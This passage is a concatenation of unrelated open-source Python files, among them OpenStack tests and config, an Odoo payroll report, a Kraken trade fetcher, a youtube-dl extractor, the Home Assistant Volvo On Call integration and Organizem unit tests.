self._test_multitenancy('json')
def test_internal_error(self):
"""Check that internal errors do not leak.
Any internal, unexpected error should be turned into a 500 response
without any traces of the original exception.
"""
orig_exception_msg = "An exception with a traceback"
@APIFaultWrapper()
def raise_exception(self, *args, **kwargs):
raise Exception(orig_exception_msg)
list_network_req = testlib.network_list_request(self.tenant_id, "json")
with mock.patch.object(Controller, 'index', new=raise_exception):
list_network_res = list_network_req.get_response(self.api)
self.assertEqual(list_network_res.status_int, 500)
self.assertNotIn(orig_exception_msg, list_network_res.body)
|
duhzecca/cinder | refs/heads/master | cinder/tests/unit/fake_vmem_client.py | 23 | # Copyright 2014 Violin Memory, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Fake VMEM REST client for testing drivers.
"""
import sys
import mock
# The following gymnastics to fake an exception class globally is done because
# we want to globally model and make available certain exceptions. If we do
# not do this, then the real-driver's import will not see our fakes.
class NoMatchingObjectIdError(Exception):
pass
error = mock.Mock()
error.NoMatchingObjectIdError = NoMatchingObjectIdError
core = mock.Mock()
core.attach_mock(error, 'error')
vmemclient = mock.Mock()
vmemclient.__version__ = "unknown"
vmemclient.attach_mock(core, 'core')
sys.modules['vmemclient'] = vmemclient
mock_client_conf = [
'basic',
'basic.login',
'basic.get_node_values',
'basic.save_config',
'lun',
'lun.export_lun',
'lun.unexport_lun',
'snapshot',
'snapshot.export_lun_snapshot',
'snapshot.unexport_lun_snapshot',
'iscsi',
'iscsi.bind_ip_to_target',
'iscsi.create_iscsi_target',
'iscsi.delete_iscsi_target',
'igroup',
'client',
'client.get_client_info',
'client.create_client',
'client.delete_client',
'adapter',
'adapter.get_fc_info'
]
|
double12gzh/nova | refs/heads/master | nova/cells/opts.py | 6 | # Copyright (c) 2012 Rackspace Hosting
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Global cells config options
"""
from oslo_config import cfg
cells_opts = [
cfg.BoolOpt('enable',
default=False,
help='Enable cell functionality'),
cfg.StrOpt('topic',
default='cells',
help='The topic cells nodes listen on'),
cfg.StrOpt('manager',
default='nova.cells.manager.CellsManager',
help='Manager for cells'),
cfg.StrOpt('name',
default='nova',
help='Name of this cell'),
cfg.ListOpt('capabilities',
default=['hypervisor=xenserver;kvm', 'os=linux;windows'],
help='Key/Multi-value list with the capabilities of the cell'),
cfg.IntOpt('call_timeout',
default=60,
help='Seconds to wait for response from a call to a cell.'),
cfg.FloatOpt('reserve_percent',
default=10.0,
help='Percentage of cell capacity to hold in reserve. '
'Affects both memory and disk utilization'),
cfg.StrOpt('cell_type',
default='compute',
choices=('api', 'compute'),
help='Type of cell'),
cfg.IntOpt("mute_child_interval",
default=300,
help='Number of seconds after which a lack of capability and '
'capacity updates signals the child cell is to be '
'treated as a mute.'),
cfg.IntOpt('bandwidth_update_interval',
default=600,
help='Seconds between bandwidth updates for cells.'),
]
CONF = cfg.CONF
CONF.register_opts(cells_opts, group='cells')
def get_cell_type():
"""Return the cell type, 'api', 'compute', or None (if cells is disabled).
"""
if not CONF.cells.enable:
return
return CONF.cells.cell_type
|
orchidinfosys/odoo | refs/heads/master | addons/l10n_in_hr_payroll/report/report_hr_salary_employee_bymonth.py | 47 | #-*- coding:utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import datetime
import time
from openerp.osv import osv
from openerp.report import report_sxw
class report_hr_salary_employee_bymonth(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(report_hr_salary_employee_bymonth, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
'get_employee': self.get_employee,
'get_periods': self.get_periods,
'get_months_tol': self.get_months_tol,
'get_total': self.get_total,
})
self.context = context
self.mnths = []
self.mnths_total = []
self.total = 0.0
def get_periods(self, form):
# Get start year-month-date and end year-month-date
first_year = int(form['start_date'][0:4])
last_year = int(form['end_date'][0:4])
first_month = int(form['start_date'][5:7])
last_month = int(form['end_date'][5:7])
no_months = (last_year-first_year) * 12 + last_month - first_month + 1
current_month = first_month
current_year = first_year
# Get name of the months from integer
mnth_name = []
for count in range(0, no_months):
m = datetime.date(current_year, current_month, 1).strftime('%b')
mnth_name.append(m)
self.mnths.append(str(current_month) + '-' + str(current_year))
if current_month == 12:
current_month = 0
current_year = last_year
current_month = current_month + 1
for c in range(0, (12-no_months)):
mnth_name.append('')
self.mnths.append('')
return [mnth_name]
def get_salary(self, form, emp_id, emp_salary, total_mnths):
category_id = form.get('category_id', [])
category_id = category_id and category_id[0] or False
self.cr.execute("select to_char(date_to,'mm-yyyy') as to_date ,sum(pl.total) \
from hr_payslip_line as pl \
left join hr_payslip as p on pl.slip_id = p.id \
left join hr_employee as emp on emp.id = p.employee_id \
left join resource_resource as r on r.id = emp.resource_id \
where p.state = 'done' and p.employee_id = %s and pl.category_id = %s \
group by r.name, p.date_to,emp.id",(emp_id, category_id,))
sal = self.cr.fetchall()
salary = dict(sal)
total = 0.0
cnt = 0
for month in self.mnths:
if month <> '':
if len(month) != 7:
month = '0' + str(month)
if month in salary and salary[month]:
emp_salary.append(salary[month])
total += salary[month]
total_mnths[cnt] = total_mnths[cnt] + salary[month]
else:
emp_salary.append(0.00)
else:
emp_salary.append('')
total_mnths[cnt] = ''
cnt = cnt + 1
return emp_salary, total, total_mnths
def get_employee(self, form):
emp_salary = []
salary_list = []
total_mnths=[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
emp_obj = self.pool.get('hr.employee')
emp_ids = form.get('employee_ids', [])
employees = emp_obj.browse(self.cr, self.uid, emp_ids, context=self.context)
for emp_id in employees:
emp_salary.append(emp_id.name)
total = 0.0
emp_salary, total, total_mnths = self.get_salary(form, emp_id.id, emp_salary, total_mnths)
emp_salary.append(total)
salary_list.append(emp_salary)
emp_salary = []
self.mnths_total.append(total_mnths)
return salary_list
def get_months_tol(self):
return self.mnths_total
def get_total(self):
for item in self.mnths_total:
for count in range(1, len(item)):
if item[count] == '':
continue
self.total += item[count]
return self.total
class wrapped_report_employee_salary_bymonth(osv.AbstractModel):
_name = 'report.l10n_in_hr_payroll.report_hrsalarybymonth'
_inherit = 'report.abstract_report'
_template = 'l10n_in_hr_payroll.report_hrsalarybymonth'
_wrapped_report_class = report_hr_salary_employee_bymonth
|
sebschre/cryptoAssetManager | refs/heads/master | fillKrakenDB.py | 1 | #!/usr/bin/env python3
import sys
from QueryPublic import QueryPublicKraken
from Trade import Trade, TradeList
from DBConnections import KrakenDBConnection
from datetime import datetime, timedelta
query = QueryPublicKraken()
with KrakenDBConnection() as dbconn:
try:
cursor = dbconn.cursor()
cursor.execute("SELECT unixtime FROM TRADESXETHZEUR ORDER BY unixtime DESC LIMIT 1")
lasttimestamp = cursor.fetchone()[0]
sinceTime = query.unixtime2datetime(lasttimestamp)
except:
sinceTime = datetime(1990, 1, 1, 1, 0, 0, 0)
finally:
cursor.close()
while sinceTime < datetime.today():
try:
print(sinceTime)
tradesXETHZEUR, to_ns = query.tradesOneThousand(pair = 'XETHZEUR', since_ns = lasttimestamp)
tradeList = TradeList(tradesXETHZEUR)
tradeList.saveInDB()
lasttimestamp = int(to_ns) + 1
sinceTime = query.unixtime2datetime(lasttimestamp)
except (KeyboardInterrupt, SystemExit):
print("KeyboardInterrrupt, Bye!")
sys.exit()
except:
pass
|
expobrain/python-unotifier | refs/heads/master | unotifier/notifiers/notifysend.py | 1 | from __future__ import unicode_literals
import os
from .. import VENDOR_PATH
from .abstract import AbstractNotifier
class NotifySendNotifier(AbstractNotifier):
notifier_cmd = os.path.join(VENDOR_PATH, 'notify-send')
def get_cmd_options(self, options):
options = self._map_app_icon(options)
options = self._map_text(options)
return options
|
mikemow/youtube-dl | refs/heads/master | youtube_dl/extractor/sztvhu.py | 148 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from .common import InfoExtractor
class SztvHuIE(InfoExtractor):
_VALID_URL = r'http://(?:(?:www\.)?sztv\.hu|www\.tvszombathely\.hu)/(?:[^/]+)/.+-(?P<id>[0-9]+)'
_TEST = {
'url': 'http://sztv.hu/hirek/cserkeszek-nepszerusitettek-a-kornyezettudatos-eletmodot-a-savaria-teren-20130909',
'md5': 'a6df607b11fb07d0e9f2ad94613375cb',
'info_dict': {
'id': '20130909',
'ext': 'mp4',
'title': 'Cserkészek népszerűsítették a környezettudatos életmódot a Savaria téren',
'description': 'A zöld nap játékos ismeretterjesztő programjait a Magyar Cserkész Szövetség szervezte, akik az ország nyolc városában adják át tudásukat az érdeklődőknek. A PET...',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_file = self._search_regex(
r'file: "...:(.*?)",', webpage, 'video file')
title = self._html_search_regex(
r'<meta name="title" content="([^"]*?) - [^-]*? - [^-]*?"',
webpage, 'video title')
description = self._html_search_regex(
r'<meta name="description" content="([^"]*)"/>',
webpage, 'video description', fatal=False)
thumbnail = self._og_search_thumbnail(webpage)
video_url = 'http://media.sztv.hu/vod/' + video_file
return {
'id': video_id,
'url': video_url,
'title': title,
'description': description,
'thumbnail': thumbnail,
}
|
home-assistant/home-assistant | refs/heads/dev | homeassistant/components/volvooncall/__init__.py | 5 | """Support for Volvo On Call."""
from datetime import timedelta
import logging
import voluptuous as vol
from volvooncall import Connection
from homeassistant.const import (
CONF_NAME,
CONF_PASSWORD,
CONF_REGION,
CONF_RESOURCES,
CONF_SCAN_INTERVAL,
CONF_USERNAME,
)
from homeassistant.helpers import discovery
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.util.dt import utcnow
DOMAIN = "volvooncall"
DATA_KEY = DOMAIN
_LOGGER = logging.getLogger(__name__)
MIN_UPDATE_INTERVAL = timedelta(minutes=1)
DEFAULT_UPDATE_INTERVAL = timedelta(minutes=1)
CONF_SERVICE_URL = "service_url"
CONF_SCANDINAVIAN_MILES = "scandinavian_miles"
CONF_MUTABLE = "mutable"
SIGNAL_STATE_UPDATED = f"{DOMAIN}.updated"
PLATFORMS = {
"sensor": "sensor",
"binary_sensor": "binary_sensor",
"lock": "lock",
"device_tracker": "device_tracker",
"switch": "switch",
}
RESOURCES = [
"position",
"lock",
"heater",
"odometer",
"trip_meter1",
"trip_meter2",
"average_speed",
"fuel_amount",
"fuel_amount_level",
"average_fuel_consumption",
"distance_to_empty",
"washer_fluid_level",
"brake_fluid",
"service_warning_status",
"bulb_failures",
"battery_range",
"battery_level",
"time_to_fully_charged",
"battery_charge_status",
"engine_start",
"last_trip",
"is_engine_running",
"doors_hood_open",
"doors_tailgate_open",
"doors_front_left_door_open",
"doors_front_right_door_open",
"doors_rear_left_door_open",
"doors_rear_right_door_open",
"windows_front_left_window_open",
"windows_front_right_window_open",
"windows_rear_left_window_open",
"windows_rear_right_window_open",
"tyre_pressure_front_left_tyre_pressure",
"tyre_pressure_front_right_tyre_pressure",
"tyre_pressure_rear_left_tyre_pressure",
"tyre_pressure_rear_right_tyre_pressure",
"any_door_open",
"any_window_open",
]
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(
CONF_SCAN_INTERVAL, default=DEFAULT_UPDATE_INTERVAL
): vol.All(cv.time_period, vol.Clamp(min=MIN_UPDATE_INTERVAL)),
vol.Optional(CONF_NAME, default={}): cv.schema_with_slug_keys(
cv.string
),
vol.Optional(CONF_RESOURCES): vol.All(
cv.ensure_list, [vol.In(RESOURCES)]
),
vol.Optional(CONF_REGION): cv.string,
vol.Optional(CONF_SERVICE_URL): cv.string,
vol.Optional(CONF_MUTABLE, default=True): cv.boolean,
vol.Optional(CONF_SCANDINAVIAN_MILES, default=False): cv.boolean,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up the Volvo On Call component."""
session = async_get_clientsession(hass)
connection = Connection(
session=session,
username=config[DOMAIN].get(CONF_USERNAME),
password=config[DOMAIN].get(CONF_PASSWORD),
service_url=config[DOMAIN].get(CONF_SERVICE_URL),
region=config[DOMAIN].get(CONF_REGION),
)
interval = config[DOMAIN][CONF_SCAN_INTERVAL]
data = hass.data[DATA_KEY] = VolvoData(config)
def is_enabled(attr):
"""Return true if the user has enabled the resource."""
return attr in config[DOMAIN].get(CONF_RESOURCES, [attr])
def discover_vehicle(vehicle):
"""Load relevant platforms."""
data.vehicles.add(vehicle.vin)
dashboard = vehicle.dashboard(
mutable=config[DOMAIN][CONF_MUTABLE],
scandinavian_miles=config[DOMAIN][CONF_SCANDINAVIAN_MILES],
)
for instrument in (
instrument
for instrument in dashboard.instruments
if instrument.component in PLATFORMS and is_enabled(instrument.slug_attr)
):
data.instruments.add(instrument)
hass.async_create_task(
discovery.async_load_platform(
hass,
PLATFORMS[instrument.component],
DOMAIN,
(vehicle.vin, instrument.component, instrument.attr),
config,
)
)
async def update(now):
"""Update status from the online service."""
try:
if not await connection.update(journal=True):
_LOGGER.warning("Could not query server")
return False
for vehicle in connection.vehicles:
if vehicle.vin not in data.vehicles:
discover_vehicle(vehicle)
async_dispatcher_send(hass, SIGNAL_STATE_UPDATED)
return True
finally:
async_track_point_in_utc_time(hass, update, utcnow() + interval)
_LOGGER.info("Logging in to service")
return await update(utcnow())
class VolvoData:
"""Hold component state."""
def __init__(self, config):
"""Initialize the component state."""
self.vehicles = set()
self.instruments = set()
self.config = config[DOMAIN]
self.names = self.config.get(CONF_NAME)
def instrument(self, vin, component, attr):
"""Return corresponding instrument."""
return next(
(
instrument
for instrument in self.instruments
if instrument.vehicle.vin == vin
and instrument.component == component
and instrument.attr == attr
),
None,
)
def vehicle_name(self, vehicle):
"""Provide a friendly name for a vehicle."""
if (
vehicle.registration_number and vehicle.registration_number.lower()
) in self.names:
return self.names[vehicle.registration_number.lower()]
if vehicle.vin and vehicle.vin.lower() in self.names:
return self.names[vehicle.vin.lower()]
if vehicle.registration_number:
return vehicle.registration_number
if vehicle.vin:
return vehicle.vin
return ""
class VolvoEntity(Entity):
"""Base class for all VOC entities."""
def __init__(self, data, vin, component, attribute):
"""Initialize the entity."""
self.data = data
self.vin = vin
self.component = component
self.attribute = attribute
async def async_added_to_hass(self):
"""Register update dispatcher."""
self.async_on_remove(
async_dispatcher_connect(
self.hass, SIGNAL_STATE_UPDATED, self.async_write_ha_state
)
)
@property
def instrument(self):
"""Return corresponding instrument."""
return self.data.instrument(self.vin, self.component, self.attribute)
@property
def icon(self):
"""Return the icon."""
return self.instrument.icon
@property
def vehicle(self):
"""Return vehicle."""
return self.instrument.vehicle
@property
def _entity_name(self):
return self.instrument.name
@property
def _vehicle_name(self):
return self.data.vehicle_name(self.vehicle)
@property
def name(self):
"""Return full name of the entity."""
return f"{self._vehicle_name} {self._entity_name}"
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return True
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
return dict(
self.instrument.attributes,
model=f"{self.vehicle.vehicle_type}/{self.vehicle.model_year}",
)
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return f"{self.vin}-{self.component}-{self.attribute}"
|
marksweiss/organize-m | refs/heads/master | test/organizem_test.py | 1 | import unittest
import sys
sys.path.insert(0, '..')
from lib.item import Item, Elem
from lib.organizem import Organizem, Conf
from lib.orgm_controller_base import ActionArg
TEST_DATA_FILE = "orgm_test.dat"
TEST_BAK_FILE = "orgm_test_bak.dat"
IS_UNIT_TESTING = True
Organizem(TEST_DATA_FILE, IS_UNIT_TESTING).setconf(Conf.BAK_FILE, TEST_BAK_FILE)
class OrganizemTestCase(unittest.TestCase):
# Helpers
def _init_test_data_file(self):
with open(TEST_DATA_FILE, 'w') as f:
item = Item("TEST_ITEM")
f.write(str(item))
# Tests
def test_init_item(self):
title = "title"
item = Item(title)
self.assertTrue(item != None)
self.assertTrue(isinstance(item, Item))
self.assertTrue(item.title == title)
def test_init_organizem(self):
self._init_test_data_file()
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
self.assertTrue(orgm != None)
self.assertTrue(isinstance(orgm, Organizem))
self.assertTrue(orgm.data_file == TEST_DATA_FILE)
def test_add_item__find_item_by_title(self):
self._init_test_data_file()
title = "title"
item = Item(title)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.TITLE, title))
def test_add_item__find_rgx_item_by_title(self):
self._init_test_data_file()
title = "title"
rgx_match = "titl*"
item = Item(title)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_area(self):
self._init_test_data_file()
title = "title"
area = "my area"
item = Item(title, {Elem.AREA : area})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.AREA, area))
def test_add_item__find_rgx_item_by_area(self):
self._init_test_data_file()
title = "title"
area = "area"
rgx_match = "are*"
item = Item(title, {Elem.AREA : area})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_project(self):
self._init_test_data_file()
title = "title"
project = "my project"
item = Item(title, {Elem.PROJECT : project})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PROJECT, project))
def test_add_item__find_rgx_items_by_project(self):
self._init_test_data_file()
title = "title"
project = "my project"
rgx_match = "my proj*"
item = Item(title, {Elem.PROJECT : project})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PROJECT, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_tags(self):
self._init_test_data_file()
title = "title"
# Test case of single-value passed to find_items() for a
# element that is stored in item as a list (tags)
tag1 = 'tag 1'
tags1 = [tag1]
item1 = Item(title, {Elem.TAGS : tags1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.TAGS, tag1))
# Test case of multi-value list passed to find_items() for a
# element that is stored in item as a list (tags)
tag2 = 'tag 2'
tags2 = [tag1, tag2]
item2 = Item(title, {Elem.TAGS : tags2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.TAGS, tag2))
self.assertTrue(orgm.find_items(Elem.TAGS, tags2))
def test_add_item__find_rgx_items_by_tags(self):
self._init_test_data_file()
title = "title"
# Test case of single-value passed to find_items() for a
# element that is stored in item as a list (tags)
tag1 = 'tag 1001'
tag1_rgx = 'tag 100*'
tags1 = [tag1]
item1 = Item(title, {Elem.TAGS : tags1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.TAGS, tag1_rgx, use_regex_match=True))
# Test case of multi-value list passed to find_items() for a
# element that is stored in item as a list (tags)
tag2 = 'tag 1012'
tag2_rgx = 'tag 101*'
tags2 = [tag1, tag2]
item2 = Item(title, {Elem.TAGS : tags2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.TAGS, tag2_rgx, use_regex_match=True))
def test_add_item__find_items_by_actions(self):
self._init_test_data_file()
title = "title"
action1 = 'action 100'
action1_rgx = 'action 10*'
actions1 = [action1]
# TODO FIX ALL THESE Itme() ctor calls
item1 = Item(title, {Elem.ACTIONS : actions1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx, use_regex_match=True))
action2 = 'action 200'
actions2 = [action1, action2]
item2 = Item(title, {Elem.ACTIONS : actions2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action2))
self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2))
def test_add_item__find_rgx_items_by_actions(self):
self._init_test_data_file()
title = "title"
# Test case of single-value passed to find_items() for a
# element that is stored in item as a list (tags)
action1 = 'action 1010'
action1_rgx = 'action 101*'
actions1 = [action1]
item1 = Item(title, {Elem.ACTIONS : actions1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx, use_regex_match=True))
# Test case of multi-value list passed to find_items() for a
# element that is stored in item as a list (tags)
action2 = 'action 1020'
action2_rgx = 'action 102*'
actions2 = [action1, action2]
item2 = Item(title, {Elem.ACTIONS : actions2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action2_rgx, use_regex_match=True))
def test_add_item__find_items_by_priority(self):
self._init_test_data_file()
title = "title"
priority = "P1"
item = Item(title, {Elem.PRIORITY : priority})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PRIORITY, priority))
def test_add_item__find_rgx_items_by_priority(self):
self._init_test_data_file()
title = "title"
priority = "P1"
rgx_match = "P*"
item = Item(title, {Elem.PRIORITY : priority})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PRIORITY, rgx_match, use_regex_match=True))
def test_add_item__find_items_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note))
def test_add_item__find_rgx_items_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
note_rgx = "\* Support for reporting *"
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx, use_regex_match=True))
def test_remove_items_rgx_by_title(self):
self._init_test_data_file()
title = "title"
rgx_match = "titl*"
item = Item(title)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True))
# NOTE: Now remove the item and check that it's not there any more
orgm.remove_items(Elem.TITLE, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.TITLE, rgx_match, use_regex_match=True))
def test_remove_items_rgx_by_area(self):
self._init_test_data_file()
title = "title"
area = "area"
rgx_match = "are*"
item = Item(title, {Elem.AREA : area})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True))
orgm.remove_items(Elem.AREA, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.AREA, rgx_match, use_regex_match=True))
def test_remove_items_by_project(self):
self._init_test_data_file()
title = "title"
project = "project"
item = Item(title, {Elem.PROJECT : project})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.PROJECT, project))
orgm.remove_items(Elem.PROJECT, project)
self.assertFalse(orgm.find_items(Elem.PROJECT, project))
def test_remove_items_by_tags(self):
self._init_test_data_file()
title = "title"
tag1 = 'tag 1'
tags1 = [tag1]
item1 = Item(title, {Elem.TAGS : tags1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.TAGS, tag1))
orgm.remove_items(Elem.TAGS, tag1)
self.assertFalse(orgm.find_items(Elem.TAGS, tag1))
tag2 = 'tag 2'
tags2 = [tag1, tag2]
item2 = Item(title, {Elem.TAGS : tags2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.TAGS, tag2))
self.assertTrue(orgm.find_items(Elem.TAGS, tags2))
orgm.remove_items(Elem.TAGS, tags2)
self.assertFalse(orgm.find_items(Elem.TAGS, tags2))
def test_remove_items_rgx_by_actions(self):
self._init_test_data_file()
title = "title"
action1 = 'action 110'
rgx_match = "action 11*"
actions1 = [action1]
item1 = Item(title, {Elem.ACTIONS : actions1})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action1))
orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.ACTIONS, action1))
action2 = 'action 101'
rgx_match = "action 10*"
actions2 = [action1, action2]
item2 = Item(title, {Elem.ACTIONS : actions2})
orgm.add_item(item2)
self.assertTrue(orgm.find_items(Elem.ACTIONS, action2))
self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2))
orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.ACTIONS, actions2))
def test_remove_items_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note))
orgm.remove_items(Elem.NOTE, note)
self.assertFalse(orgm.find_items(Elem.NOTE, note))
def test_remove_items_rgx_by_note(self):
self._init_test_data_file()
title = "title"
note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj;
a dafs asdfdsa wkwjl;qq;q;"""
note_rgx = "\* Support for reporting *"
item = Item(title, {Elem.NOTE : note})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item)
self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx, use_regex_match=True))
orgm.remove_items(Elem.NOTE, note_rgx, use_regex_match=True)
self.assertFalse(orgm.find_items(Elem.NOTE, note_rgx))
def test_get_all_titles(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
item1 = Item(title1)
item2 = Item(title2)
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
# Have to handle the fact that init of test dat file includes dummy item with "TEST_ITEM" title
self.assertTrue(orgm.get_elements(Elem.TITLE) == ['TEST_ITEM', 'title 1', 'title 2'])
def test_get_all_projects(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
project1 = 'project 1'
project2 = 'project 2'
item1 = Item(title1, {Elem.PROJECT : project1})
item2 = Item(title2, {Elem.PROJECT : project2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ["''", 'project 1', 'project 2']
actual = orgm.get_elements(Elem.PROJECT)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_all_areas(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ["''", 'area 1', 'area 2']
actual = orgm.get_elements(Elem.AREA)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_all_tags(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
tags1 = ['tag 1', 'tag 2']
tags2 = ['tag 3', 'tag 4']
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ['tag 1', 'tag 2', 'tag 3', 'tag 4']
actual = orgm.get_elements(Elem.TAGS)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_all_actions(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
actions1 = ['action 1', 'action 2']
